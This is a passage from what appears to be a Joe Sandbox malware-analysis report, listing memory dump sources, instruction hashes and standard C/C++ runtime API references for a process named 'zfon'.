                                                                                                                                                                            • Associated: 00000006.00000002.1996838539.00007FF79D223000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.1996867832.00007FF79D225000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.1996914836.00007FF79D239000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_6_2_7ff79cfb0000_zfon.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: Xbad_alloc@std@@$_invalid_parameter_noinfo_noreturn
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 2582267257-0
                                                                                                                                                                            • Opcode ID: 22008d081fcb802cd2ca1249ed3b68a01df3c254b4f916e0378cb5af36a1206e
                                                                                                                                                                            • Instruction ID: 9ae72b150fbce7f5dc9b5aca636f24099d30f0c69af99e378530a18e01e4d697
                                                                                                                                                                            • Opcode Fuzzy Hash: 22008d081fcb802cd2ca1249ed3b68a01df3c254b4f916e0378cb5af36a1206e
                                                                                                                                                                            • Instruction Fuzzy Hash: 6F0181B5F0A61351FD38F378958A338A1F6EF44BA0FC00634C56D423D4FE6C64868221
                                                                                                                                                                            APIs
                                                                                                                                                                            • ?_Xbad_alloc@std@@YAXXZ.MSVCP140(?,?,?,?,?,?,?,?,?,?,?,?,00007FF79CFC4224), ref: 00007FF79CFC987F
                                                                                                                                                                            • ?_Xbad_alloc@std@@YAXXZ.MSVCP140(?,?,?,?,?,?,?,?,?,?,?,?,00007FF79CFC4224), ref: 00007FF79CFC98A0
                                                                                                                                                                            • new.LIBCMT ref: 00007FF79CFC98AA
                                                                                                                                                                            • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,?,00007FF79CFC4224), ref: 00007FF79CFC98B7
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000006.00000002.1996090327.00007FF79CFB1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF79CFB0000, based on PE: true
                                                                                                                                                                            • Associated: 00000006.00000002.1996054187.00007FF79CFB0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.1996313483.00007FF79D09A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.1996313483.00007FF79D1A5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.1996761992.00007FF79D211000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.1996796435.00007FF79D212000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.1996838539.00007FF79D223000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.1996867832.00007FF79D225000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.1996914836.00007FF79D239000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_6_2_7ff79cfb0000_zfon.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: Xbad_alloc@std@@$_invalid_parameter_noinfo_noreturn
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 2582267257-0
                                                                                                                                                                            • Opcode ID: 299676f5ed099db6b6025b468dfcc04c54bdedd21b94257f90a8872ff9d81810
                                                                                                                                                                            • Instruction ID: cbf7d0dfcb94eeac28a7c844e2e1ff500770308cfda461cf0fb0f319d646ab5a
                                                                                                                                                                            • Opcode Fuzzy Hash: 299676f5ed099db6b6025b468dfcc04c54bdedd21b94257f90a8872ff9d81810
                                                                                                                                                                            • Instruction Fuzzy Hash: 5A018665F4A60351FD68F776B589338A1A2AF45B60FC00A34C52D863D4FE1C65858222
                                                                                                                                                                            APIs
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000006.00000002.1996090327.00007FF79CFB1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF79CFB0000, based on PE: true
                                                                                                                                                                            • Associated: 00000006.00000002.1996054187.00007FF79CFB0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.1996313483.00007FF79D09A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.1996313483.00007FF79D1A5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.1996761992.00007FF79D211000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.1996796435.00007FF79D212000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.1996838539.00007FF79D223000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.1996867832.00007FF79D225000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.1996914836.00007FF79D239000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_6_2_7ff79cfb0000_zfon.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: Xbad_alloc@std@@$_invalid_parameter_noinfo_noreturn
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 2582267257-0
                                                                                                                                                                            • Opcode ID: df32d05ea09cbf875a063a74e2004c604787f01abbfeaa2e241b8ecd85f65cee
                                                                                                                                                                            • Instruction ID: 326c34323acd5390236e555f7d4c25a8c4b364c157dd9a54aa6f8922d93f32db
                                                                                                                                                                            • Opcode Fuzzy Hash: df32d05ea09cbf875a063a74e2004c604787f01abbfeaa2e241b8ecd85f65cee
                                                                                                                                                                            • Instruction Fuzzy Hash: 72016275F4A50352ED28F3749549338A1E2AF557A1FC10634C52E027D8FF5C64868321
                                                                                                                                                                            APIs
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000006.00000002.1996090327.00007FF79CFB1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF79CFB0000, based on PE: true
                                                                                                                                                                            • Associated: 00000006.00000002.1996054187.00007FF79CFB0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.1996313483.00007FF79D09A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.1996313483.00007FF79D1A5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.1996761992.00007FF79D211000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.1996796435.00007FF79D212000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.1996838539.00007FF79D223000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.1996867832.00007FF79D225000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.1996914836.00007FF79D239000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_6_2_7ff79cfb0000_zfon.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: Xbad_alloc@std@@$_invalid_parameter_noinfo_noreturn
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 2582267257-0
                                                                                                                                                                            • Opcode ID: 96c7a756f207ce34266089aa0f1babb719ca79f35fc216322b591ea9cc0b8032
                                                                                                                                                                            • Instruction ID: 54af649afc0afbfb0689f12b886c289a4f53dc86dae74abe6ba968aab6cb5923
                                                                                                                                                                            • Opcode Fuzzy Hash: 96c7a756f207ce34266089aa0f1babb719ca79f35fc216322b591ea9cc0b8032
                                                                                                                                                                            • Instruction Fuzzy Hash: 0CF08165E0A60350FD38B378A85A338E1B6AF45B70FD00735C67D013E8FE2C64868230
                                                                                                                                                                            APIs
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000006.00000002.1996090327.00007FF79CFB1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF79CFB0000, based on PE: true
                                                                                                                                                                            • Associated: 00000006.00000002.1996054187.00007FF79CFB0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.1996313483.00007FF79D09A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.1996313483.00007FF79D1A5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.1996761992.00007FF79D211000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.1996796435.00007FF79D212000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.1996838539.00007FF79D223000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.1996867832.00007FF79D225000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.1996914836.00007FF79D239000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_6_2_7ff79cfb0000_zfon.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: Xbad_alloc@std@@$_invalid_parameter_noinfo_noreturn
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 2582267257-0
                                                                                                                                                                            • Opcode ID: b922828b7e2684afbcf6d79d91bb5d9672ec89368d0f2cf6d04bfcc6100c8038
                                                                                                                                                                            • Instruction ID: 4786d21d449e4d6e7cb3810e2625422283ba1130cc3dd1bb0953eca2dd9f7cdc
                                                                                                                                                                            • Opcode Fuzzy Hash: b922828b7e2684afbcf6d79d91bb5d9672ec89368d0f2cf6d04bfcc6100c8038
                                                                                                                                                                            • Instruction Fuzzy Hash: 5FF06966E4A60350FE28B37AA989378A1B2AF44770FC04B34C57D027E5FE2C64868220
                                                                                                                                                                            APIs
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000006.00000002.1996090327.00007FF79CFB1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF79CFB0000, based on PE: true
                                                                                                                                                                            • Associated: 00000006.00000002.1996054187.00007FF79CFB0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.1996313483.00007FF79D09A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.1996313483.00007FF79D1A5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.1996761992.00007FF79D211000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.1996796435.00007FF79D212000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.1996838539.00007FF79D223000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.1996867832.00007FF79D225000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.1996914836.00007FF79D239000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_6_2_7ff79cfb0000_zfon.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: Xbad_alloc@std@@$_invalid_parameter_noinfo_noreturn
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 2582267257-0
                                                                                                                                                                            • Opcode ID: 489ec8070939499f2d05b687d8ce4eb02601b61b06c68322a53f6d41bb116b41
                                                                                                                                                                            • Instruction ID: 8c2ad07e8883c2aff2d34148071d3fda7684379efa754eed112a1488ba0dd17a
                                                                                                                                                                            • Opcode Fuzzy Hash: 489ec8070939499f2d05b687d8ce4eb02601b61b06c68322a53f6d41bb116b41
                                                                                                                                                                            • Instruction Fuzzy Hash: B6F01DB6E5A64361ED28F378AA4933891A6AF44770FC00B34D57D057E4FF6C66968220
                                                                                                                                                                            APIs
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000006.00000002.1996090327.00007FF79CFB1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF79CFB0000, based on PE: true
                                                                                                                                                                            • Associated: 00000006.00000002.1996054187.00007FF79CFB0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.1996313483.00007FF79D09A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.1996313483.00007FF79D1A5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.1996761992.00007FF79D211000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.1996796435.00007FF79D212000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.1996838539.00007FF79D223000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.1996867832.00007FF79D225000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.1996914836.00007FF79D239000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_6_2_7ff79cfb0000_zfon.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: Xbad_alloc@std@@$_invalid_parameter_noinfo_noreturn
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 2582267257-0
                                                                                                                                                                            • Opcode ID: 62d9ba69d16ddf7e9d05fb0b96c0b2a14d2ee61e873a52316fb28099adf97e6b
                                                                                                                                                                            • Instruction ID: 244af2e4585cced92835ab4c12d77424deea6528241af66254d9d4d7196576c2
                                                                                                                                                                            • Opcode Fuzzy Hash: 62d9ba69d16ddf7e9d05fb0b96c0b2a14d2ee61e873a52316fb28099adf97e6b
                                                                                                                                                                            • Instruction Fuzzy Hash: 33F04FA6E4A50352FD38B3B4A949339A1A2AF55771FC04B34C57E056D8BF2C25864320
                                                                                                                                                                            APIs
                                                                                                                                                                            • memchr.VCRUNTIME140 ref: 00007FFBC1B65222
                                                                                                                                                                            • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FFBC1B652FE
                                                                                                                                                                              • Part of subcall function 00007FFBC1B7CAC4: malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,00000000,00007FFBC1B3C4D0), ref: 00007FFBC1B7CADE
                                                                                                                                                                            • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FFBC1B6535B
                                                                                                                                                                            • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FFBC1B653F7
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000006.00000002.2007670403.00007FFBC1B31000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FFBC1B30000, based on PE: true
                                                                                                                                                                            • Associated: 00000006.00000002.2007643522.00007FFBC1B30000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.2007795620.00007FFBC1B82000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.2007845526.00007FFBC1BBF000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.2007873683.00007FFBC1BC0000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.2007899726.00007FFBC1BC1000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.2007921882.00007FFBC1BC3000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.2007921882.00007FFBC1BC9000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_6_2_7ffbc1b30000_zfon.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: _invalid_parameter_noinfo_noreturn$mallocmemchr
                                                                                                                                                                            • String ID: 0123456789-
                                                                                                                                                                            • API String ID: 1035304070-3850129594
                                                                                                                                                                            • Opcode ID: d640ca200c76db91b86670c613c98aecf132a6b1f4fab212538182e6c2e15436
                                                                                                                                                                            • Instruction ID: 681de029673340f561cd65996dbda2eadd61839a64810d3662834ed0f5ebd78b
                                                                                                                                                                            • Opcode Fuzzy Hash: d640ca200c76db91b86670c613c98aecf132a6b1f4fab212538182e6c2e15436
                                                                                                                                                                            • Instruction Fuzzy Hash: E191FE66B08B8689FB04CF75D5403AE23A1EB58BE8F445235DE6E23BD9CE38E055C750
                                                                                                                                                                            APIs
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000006.00000002.2007516333.00007FFBC1B11000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FFBC1B10000, based on PE: true
                                                                                                                                                                            • Associated: 00000006.00000002.2007492836.00007FFBC1B10000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.2007546659.00007FFBC1B23000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.2007570234.00007FFBC1B28000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.2007599263.00007FFBC1B29000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_6_2_7ffbc1b10000_zfon.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: abort$CallEncodePointerTranslator
                                                                                                                                                                            • String ID: MOC$RCC
                                                                                                                                                                            • API String ID: 2889003569-2084237596
                                                                                                                                                                            • Opcode ID: 38147febd4ea3e6e4a78b6d94c663964a46ac19bb27c7a49567d3dd21f0893b1
                                                                                                                                                                            • Instruction ID: 1922b9a4fb4b0178cbb75b8a589e9d87ee2fdd42a20e284f771b0218d98e3183
                                                                                                                                                                            • Opcode Fuzzy Hash: 38147febd4ea3e6e4a78b6d94c663964a46ac19bb27c7a49567d3dd21f0893b1
                                                                                                                                                                            • Instruction Fuzzy Hash: 1991AFB7A087818AE711CF75E8403AEBBA0FB48788F215129EA4D27759DF38D195CB00
                                                                                                                                                                            APIs
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000006.00000002.2007378246.00007FFBC1B01000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FFBC1B00000, based on PE: true
                                                                                                                                                                            • Associated: 00000006.00000002.2007356448.00007FFBC1B00000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.2007408551.00007FFBC1B05000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.2007441500.00007FFBC1B08000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.2007462693.00007FFBC1B09000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_6_2_7ffbc1b00000_zfon.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: abort$CallEncodePointerTranslator
                                                                                                                                                                            • String ID: MOC$RCC
                                                                                                                                                                            • API String ID: 2889003569-2084237596
                                                                                                                                                                            • Opcode ID: 51865056d64403dec5eec8f15289c0db639756aedb22486eebb00ed42bb3dd8f
                                                                                                                                                                            • Instruction ID: ccc633c1fdb23f590ba9363d0a78f4bb837a2cdbc3aa6eb933016a5caf7a8775
                                                                                                                                                                            • Opcode Fuzzy Hash: 51865056d64403dec5eec8f15289c0db639756aedb22486eebb00ed42bb3dd8f
                                                                                                                                                                            • Instruction Fuzzy Hash: 2191A2F7A08B818AE714DF74E8802AE77A8FB45788F105129EB8D27765DF38D195CB00
                                                                                                                                                                            APIs
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000006.00000002.2007516333.00007FFBC1B11000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FFBC1B10000, based on PE: true
                                                                                                                                                                            • Associated: 00000006.00000002.2007492836.00007FFBC1B10000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.2007546659.00007FFBC1B23000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.2007570234.00007FFBC1B28000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.2007599263.00007FFBC1B29000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_6_2_7ffbc1b10000_zfon.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: Name::operator+
                                                                                                                                                                            • String ID: std::nullptr_t$std::nullptr_t $volatile$volatile
                                                                                                                                                                            • API String ID: 2943138195-757766384
                                                                                                                                                                            • Opcode ID: 792524ca3cb326ee1ddc7ad9f90e01459882d709a2987deaa3b684760cdbdca5
                                                                                                                                                                            • Instruction ID: ec11c43fe92518a2ecad9f287a34d1f2f8370b4383774028652b83120fa62180
                                                                                                                                                                            • Opcode Fuzzy Hash: 792524ca3cb326ee1ddc7ad9f90e01459882d709a2987deaa3b684760cdbdca5
                                                                                                                                                                            • Instruction Fuzzy Hash: 3A717EF9A0874288E7508F34D8902BE77A5BB09780FA66535DA4D73A69DF3CF165CB00
                                                                                                                                                                            APIs
                                                                                                                                                                            • __except_validate_context_record.LIBVCRUNTIME ref: 00007FFBC1B020F2
                                                                                                                                                                              • Part of subcall function 00007FFBC1B03524: abort.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,?,?,?,?,00007FFBC1B01222), ref: 00007FFBC1B03564
                                                                                                                                                                            • abort.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FFBC1B02247
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000006.00000002.2007378246.00007FFBC1B01000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FFBC1B00000, based on PE: true
                                                                                                                                                                            • Associated: 00000006.00000002.2007356448.00007FFBC1B00000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.2007408551.00007FFBC1B05000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.2007441500.00007FFBC1B08000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.2007462693.00007FFBC1B09000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_6_2_7ffbc1b00000_zfon.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: abort$__except_validate_context_record
                                                                                                                                                                            • String ID: $csm$csm
                                                                                                                                                                            • API String ID: 3000080923-1512788406
                                                                                                                                                                            • Opcode ID: d2e425a725b33c5f85093d2df621a517a4746e4d910d6925cc61b8c9293696ab
                                                                                                                                                                            • Instruction ID: e80a0ddb9c2dd1d8b779358902395218209addf9a2f882ad85c94dfe8b93ee8a
                                                                                                                                                                            • Opcode Fuzzy Hash: d2e425a725b33c5f85093d2df621a517a4746e4d910d6925cc61b8c9293696ab
                                                                                                                                                                            • Instruction Fuzzy Hash: E271D4FA908A818ADB608F75D4C077A77A9FB05B85F04A171DE4C27A99CF3CD495CB00
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000006.00000002.2007670403.00007FFBC1B31000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FFBC1B30000, based on PE: true
                                                                                                                                                                            • Associated: 00000006.00000002.2007643522.00007FFBC1B30000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.2007795620.00007FFBC1B82000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.2007845526.00007FFBC1BBF000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.2007873683.00007FFBC1BC0000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.2007899726.00007FFBC1BC1000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.2007921882.00007FFBC1BC3000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.2007921882.00007FFBC1BC9000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_6_2_7ffbc1b30000_zfon.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID: ios_base::badbit set$ios_base::eofbit set$ios_base::failbit set
                                                                                                                                                                            • API String ID: 0-1866435925
                                                                                                                                                                            • Opcode ID: 3f2737f50deef84665e9be22b47f0ec4f26eba845b90585ad8b064e2f81e60fc
                                                                                                                                                                            • Instruction ID: d1d32b500ff69f02fd0097ad1944103ce6287b6a117fec03c7b9568425e7703e
                                                                                                                                                                            • Opcode Fuzzy Hash: 3f2737f50deef84665e9be22b47f0ec4f26eba845b90585ad8b064e2f81e60fc
                                                                                                                                                                            • Instruction Fuzzy Hash: 47518076608B8682EB24CF29D4913BAB760FB84F94F049136DA8D57BA5DF3DD845CB00
                                                                                                                                                                            APIs
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000006.00000002.2007516333.00007FFBC1B11000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FFBC1B10000, based on PE: true
                                                                                                                                                                            • Associated: 00000006.00000002.2007492836.00007FFBC1B10000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.2007546659.00007FFBC1B23000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.2007570234.00007FFBC1B28000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.2007599263.00007FFBC1B29000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_6_2_7ffbc1b10000_zfon.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: abort$CallEncodePointerTranslator
                                                                                                                                                                            • String ID: MOC$RCC
                                                                                                                                                                            • API String ID: 2889003569-2084237596
                                                                                                                                                                            • Opcode ID: 82646d7cab88117c06501068e7e04168047599fc5f0013deb61a5a573c37227d
                                                                                                                                                                            • Instruction ID: 2ebe68db340605a3d3121e0d2d193c932dfe14084290ba0dd374ecba06cf43c8
                                                                                                                                                                            • Opcode Fuzzy Hash: 82646d7cab88117c06501068e7e04168047599fc5f0013deb61a5a573c37227d
                                                                                                                                                                            • Instruction Fuzzy Hash: E761A077908BC582DB609F25E4403AAB7A0FF85BA4F149225EB8C23B65DF7CD195CB00
                                                                                                                                                                            APIs
                                                                                                                                                                            • iswctype.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,00007FFBC1B37622), ref: 00007FFBC1B38025
                                                                                                                                                                            • iswctype.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,00007FFBC1B37622), ref: 00007FFBC1B38039
                                                                                                                                                                            • iswctype.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,00007FFBC1B37622), ref: 00007FFBC1B380A5
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000006.00000002.2007670403.00007FFBC1B31000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FFBC1B30000, based on PE: true
                                                                                                                                                                            • Associated: 00000006.00000002.2007643522.00007FFBC1B30000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.2007795620.00007FFBC1B82000.00000002.00000001.01000000.0000000C.sdmpDownload File
